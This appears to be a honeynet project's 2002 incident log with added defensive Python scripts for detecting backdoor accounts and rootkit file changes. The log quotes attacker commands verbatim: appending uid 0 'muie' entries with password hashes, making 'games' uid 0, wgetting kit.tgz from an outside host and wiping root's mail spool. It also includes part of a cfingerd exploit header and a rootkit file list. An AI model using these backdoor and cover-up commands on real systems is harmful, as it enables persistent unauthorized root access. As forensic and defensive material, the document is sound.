HoneyNet Project
Some Findings
- The project launched on 17th June 2002.
- Before September, most of the observed hacking activity consisted of ftp and
ssh CRC32 attacks, but none of them managed to break into the honeypot. The IDS
only detected proxy scanning and the occasional Nimda attempt.
September 7
Guest account login via telnet. After login, the hacker tried to fetch tools by
ftp from his/her own site but failed (the honeynet firewall cut all outgoing
traffic at that time). From the ttysnoop log we found that the hacker then
tried to build exploit tools on the honeypot by pasting source into the cat
command:
bash-2.04$ cat >> imp-finger.c
/*
- Imperfection Security Presents -
Debian GNU/Linux cfingerd remote root exploit
From shakey, of Imperfection Security [07/99]
Exploits a problem reported on BUGTRAQ in Debian's
...
The following exploit tools were tried on the honeypot host:
imp-finger
ptrace24
suk
wuftp
lpd
localroot netkit-0.17-7 local root exploit
linuxconf
7350wurm
bashack
sambaroot1
September 16
Obtained the file list of the hacker's ftp site. The hacker had tried the
hacking tools bashack, linuxcon, sambaroot, wu-imap, etc.
September 19
Hackers from Canada and Romania got a root shell via the sshd CRC32 overflow
vulnerability. A root shell connection was established on port 12345 after the
sshd overflow. Here is the trace of the hacker's activities in this root shell
connection:
w;..
echo "muie:x:0:501::/home/muie:/bin/bash">>/etc/passwd;..
echo "muie:$1$U4BxCX2h$pJFV/Gp7aKbJ4h.Ygd5eZ0:11948:0:99999:7::: ">>/etc/shadow;..
cat /etc/passwd;..
echo newoneop | passwd &> /dev/null --stdin games;..
/usr/sbin/usermod &> /dev/null -u 0 -o games;..
Hence two backdoor accounts were set up: muie (a new uid 0 entry appended to
/etc/passwd and /etc/shadow) and games (an existing account given a password
and switched to uid 0 with usermod -u 0 -o). The muie entries appear as follows
in /etc/passwd
muie:x:0:501::/home/muie:/bin/bash
in /etc/shadow
muie:$1$9oYCFsWF$3Nu4NL7OxOMNBJkw1IeWi0:11948:0:99999:7:::
(the hash differs from the one echoed in above; the ~games/.bash_history below
shows a later passwd muie).
The hacker then accessed the honeypot through these backdoor accounts.
The output of last shows:
muie pts/0 xx.xx.72.168 Thu Sep 19 05:06 - 05:46 (00:39)
muie pts/1 xx.xx.72.180 Thu Sep 19 03:45 - 03:50 (00:04)
games pts/0 xx.xx.72.180 Thu Sep 19 03:36 - 04:25 (00:49)
From the ~games/.bash_history file:
id
ftp xxx.xx.ro
ftp xxx.xxx.236.42
ls
wget www.xxx.xxx.xxx.ro/kit.tgz
netstat
cat /etc/passwd
passwd muie
id
ftp users.xxx.ro
ftp xxx.xxx.236.41
rm -rf /var/spool/mail/root
touch /var/spool/mail/root
Here is the kit.tgz list.
Another sshd compromise via the CRC32 overflow occurred on the same day. The
activities carried out by this hacker were:
- Try to install wget by rpm -ivh --force a_rpm_ftp_site
- wget the kit.tgz from his/her site
- create the hidden directory /dev/" " (a directory named with a single space)
and try to get the psyBNC rpm from an rpm site
The previous hacker came back and tried to download psy.tgz.
Here is the trace.
September 26
A hacker from Argentina broke in through the sshd CRC32 overflow vulnerability.
This time the root shell connection port was 3879 rather than 12345. The
backdoor account is still muie, but with a different password.
Now /etc/passwd has two backdoor entries for muie
muie:x:0:501::/home/muie:/bin/bash
muie:x:0:501::/home/muie:/bin/bash
but with different passwords in /etc/shadow
muie:$1$9oYCFsWF$3Nu4NL7OxOMNBJkw1IeWi0:11948:0:99999:7:::
muie:$1$U4BxCX2h$pJFV/Gp7aKbJ4h.Ygd5eZ0:11948:0:99999:7:::
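The duplicate muie entries above, and the uid 0 games account from September 19, are exactly what a quick audit of /etc/passwd and /etc/shadow catches. The following script is an added example, not part of the honeynet report: it flags uid 0 accounts other than root, duplicate user names in either file, names present in only one of the two files, and empty password fields. The sample file contents are constructed to resemble the honeypot's files after September 26; the muie lines reuse the entries shown above, the other hash fields are placeholders. Note that the C library's files lookup returns the first matching line, so only the first muie entry in each file is consulted at login; the helper effective_entry shows which one that is.

```python
"""Audit /etc/passwd and /etc/shadow contents for backdoor accounts.

Added example (not part of the honeynet report). The sample files below are
constructed; the muie lines reuse the entries shown in the report, the other
hash fields are placeholders, not real hashes.
"""
from collections import Counter

# Constructed sample: what the honeypot's files looked like after the
# September 26 intrusion (games moved to uid 0 via usermod, muie added twice).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
games:x:0:100:games:/usr/games:/bin/bash
muie:x:0:501::/home/muie:/bin/bash
muie:x:0:501::/home/muie:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$1$saltsalt$placeholderplaceholderpl:11948:0:99999:7:::
bin:*:11948:0:99999:7:::
games:$1$saltsalt$placeholderplaceholderpl:11948:0:99999:7:::
muie:$1$9oYCFsWF$3Nu4NL7OxOMNBJkw1IeWi0:11948:0:99999:7:::
muie:$1$U4BxCX2h$pJFV/Gp7aKbJ4h.Ygd5eZ0:11948:0:99999:7:::
"""

PASSWD_FIELDS = ("name", "pw", "uid", "gid", "gecos", "home", "shell")
SHADOW_FIELDS = ("name", "hash", "lastchg", "min", "max", "warn",
                 "inactive", "expire", "flag")


def parse_entries(text, fields):
    """Split a colon-separated account file into dicts, keeping file order."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        parts += [""] * (len(fields) - len(parts))  # tolerate short lines
        entries.append(dict(zip(fields, parts)))
    return entries


def effective_entry(entries, name):
    """libc's files backend stops at the first matching line, so that is the
    only entry that counts at login; a later duplicate is inert."""
    for entry in entries:
        if entry["name"] == name:
            return entry
    return None


def audit(passwd_text, shadow_text):
    """Return the findings a responder would want to see first."""
    passwd = parse_entries(passwd_text, PASSWD_FIELDS)
    shadow = parse_entries(shadow_text, SHADOW_FIELDS)

    def duplicates(entries):
        counts = Counter(e["name"] for e in entries)
        return sorted(n for n, c in counts.items() if c > 1)

    # Every uid 0 account that is not literally "root", in file order.
    seen, extra_uid0 = set(), []
    for e in passwd:
        if e["uid"] == "0" and e["name"] != "root" and e["name"] not in seen:
            seen.add(e["name"])
            extra_uid0.append(e["name"])

    passwd_names = {e["name"] for e in passwd}
    shadow_names = {e["name"] for e in shadow}

    return {
        "extra_uid0": extra_uid0,
        "dup_passwd": duplicates(passwd),
        "dup_shadow": duplicates(shadow),
        # Present in one file only: cannot be audited consistently.
        "unpaired": sorted(passwd_names ^ shadow_names),
        # Empty hash field means login with no password at all.
        "empty_password": sorted({e["name"] for e in shadow if e["hash"] == ""}),
    }


if __name__ == "__main__":
    report = audit(SAMPLE_PASSWD, SAMPLE_SHADOW)
    for key, names in report.items():
        print(f"{key:15s} {', '.join(names) or '-'}")
    live = effective_entry(parse_entries(SAMPLE_SHADOW, SHADOW_FIELDS), "muie")
    print("hash consulted for muie:", live["hash"])
```

Run it against copies of the real files with `audit(open("/etc/passwd").read(), open("/etc/shadow").read())`; on the honeypot, the extra_uid0 line alone would have exposed both backdoors.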
A hacker from Mexico tried to break in through the sshd CRC32 overflow but did
not succeed, as the honeynet firewall had cut the traffic.
October 26
A hacker from Seattle broke into the honeypot through the OpenSSL vulnerability
and successfully installed a rootkit. Here is the trace.
Here is the file list of the rootkit package:
[root@pc11 ...]# ls -Fa
./ ../ bang* test/
[root@pc11 ...]# ls -Fa test
./           adore-0.42/  crontab-entry  find*       in.telnetd*  install.log  lsof*    muie.tgz  pstree*  sshd/     syslogd*       vadim*
../          chsh*        du*            functions*  inet*        killall*     md5bd*   netstat*  sense*   stealth*  syslogd.init*  xinetd*
adore-0.34/  clean*       filez/         ifconfig*   install*     ls*          md5sum*  ps*       slice*   sysinfo*  top*
Here is the install file.
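The package above replaces the very tools (ls, ps, netstat, ifconfig, find, lsof, top, killall, syslogd, sshd, in.telnetd) an administrator would use to look for it, so the reliable check is a file-integrity comparison against a baseline taken before the compromise, the way tripwire or rpm -V work. The following Python script is an added example, not part of the report and not the rootkit's install script: it builds a manifest of a directory tree (SHA-256 and size for regular files, target for symlinks, permission bits for everything) and diffs a later manifest against it. Its demo() replays, in a temporary directory, the kind of changes seen on the honeypot: two binaries replaced, a hidden directory named with a single space created under dev, and a boot symlink re-pointed. All paths and file contents in the demo are constructed.

```python
"""Baseline-and-diff file-integrity check (tripwire / rpm -V style).

Added example: not part of the honeynet report and not the rootkit's own
install script. Everything under demo() is constructed sample data.
"""
import hashlib
import os
import stat
import tempfile


def file_digest(path):
    """SHA-256 of a regular file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Record, for every entry below root, the properties whose change we
    want to notice: type, permission bits, and either the content digest
    (regular files) or the link target (symlinks)."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)  # lstat: describe the link itself, not its target
            entry = {"mode": stat.S_IMODE(st.st_mode)}
            if stat.S_ISLNK(st.st_mode):
                entry["type"] = "symlink"
                entry["target"] = os.readlink(full)
            elif stat.S_ISREG(st.st_mode):
                entry["type"] = "file"
                entry["size"] = st.st_size
                entry["sha256"] = file_digest(full)
            elif stat.S_ISDIR(st.st_mode):
                entry["type"] = "dir"
            else:
                entry["type"] = "other"
            manifest[os.path.relpath(full, root)] = entry
    return manifest


def compare(baseline, current):
    """Diff two manifests: new paths, vanished paths, and for shared paths the
    sorted list of properties that differ."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = {}
    for rel in sorted(set(baseline) & set(current)):
        old, new = baseline[rel], current[rel]
        changed = sorted(k for k in set(old) | set(new) if old.get(k) != new.get(k))
        if changed:
            modified[rel] = changed
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed scenario: baseline a fake root, replay rootkit-style
    changes, and return the diff."""
    with tempfile.TemporaryDirectory() as root:
        bindir, bootdir = os.path.join(root, "bin"), os.path.join(root, "boot")
        os.makedirs(bindir)
        os.makedirs(bootdir)
        for tool in ("ls", "ps", "netstat", "ifconfig"):
            path = os.path.join(bindir, tool)
            with open(path, "w") as f:
                f.write(f"#!/bin/sh\necho genuine {tool}\n")  # stand-in for a real binary
            os.chmod(path, 0o755)
        for name in ("System.map-2.2.16-22", "System.map-2.2.16-22enterprise"):
            open(os.path.join(bootdir, name), "w").close()
        os.symlink("System.map-2.2.16-22enterprise", os.path.join(bootdir, "System.map"))
        baseline = build_manifest(root)

        # "Rootkit install": trojan two binaries (same mode, different bytes),
        # add a hidden directory named with a single space, re-point a symlink.
        for tool in ("ps", "netstat"):
            with open(os.path.join(bindir, tool), "w") as f:
                f.write(f"#!/bin/sh\necho trojaned {tool}\n")
        os.makedirs(os.path.join(root, "dev", " "))
        os.remove(os.path.join(bootdir, "System.map"))
        os.symlink("System.map-2.2.16-22", os.path.join(bootdir, "System.map"))

        return compare(baseline, build_manifest(root))


if __name__ == "__main__":
    result = demo()
    for path in result["added"]:
        print("added    ", repr(path))
    for path in result["removed"]:
        print("removed  ", repr(path))
    for path, props in result["modified"].items():
        print("modified ", repr(path), ", ".join(props))
```

The baseline must be stored off the host (or on read-only media) and the check run from a trusted toolchain; a manifest kept on the compromised box is only as trustworthy as the trojaned ls that lists it.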
Here are the honeypot kernel files in /boot:
[root@pc11 /boot]# ls -ltr
total 5068
-rw-r--r-- 1 root root 662413 Aug 23 2000 vmlinuz-2.2.16-22enterprise
-rwxr-xr-x 1 root root 1756599 Aug 23 2000 vmlinux-2.2.16-22enterprise
-rw-r--r-- 1 root root 213782 Aug 23 2000 System.map-2.2.16-22enterprise
-rw-r--r-- 1 root root 627392 Aug 23 2000 vmlinuz-2.2.16-22
-rwxr-xr-x 1 root root 1621492 Aug 23 2000 vmlinux-2.2.16-22
-rw-r--r-- 1 root root 11773 Aug 23 2000 module-info-2.2.16-22
-rw-r--r-- 1 root root 200285 Aug 23 2000 System.map-2.2.16-22
-rw-r--r-- 1 root root 640 Aug 23 2000 os2_d.b
-rw-r--r-- 1 root root 23108 Aug 23 2000 message
-rw-r--r-- 1 root root 612 Aug 23 2000 chain.b
-rw-r--r-- 1 root root 5824 Aug 23 2000 boot.b
-rw-r--r-- 1 root root 0 Aug 25 2000 kernel.h-2.4.0
-rw-r--r-- 1 root root 405 Jun 6 16:29 kernel.h-2.2.16
lrwxrwxrwx 1 root root 27 Jun 6 23:10 vmlinuz -> vmlinuz-2.2.16-22enterprise
lrwxrwxrwx 1 root root 31 Jun 6 23:10 module-info -> module-info-2.2.16-22enterprise
lrwxrwxrwx 1 root root 15 Jun 6 23:12 kernel.h -> kernel.h-2.2.16
-rw------- 1 root root 10752 Jun 7 00:24 map
-rw-r--r-- 1 root root 512 Jun 7 00:24 boot.0300
lrwxrwxrwx 1 root root 20 Oct 30 11:32 System.map -> System.map-2.2.16-22
Note that the System.map symlink was re-created on Oct 30 11:32, after the
October 26 break-in, and points at System.map-2.2.16-22 although vmlinuz
points at the 2.2.16-22enterprise kernel.
The adventure continues ...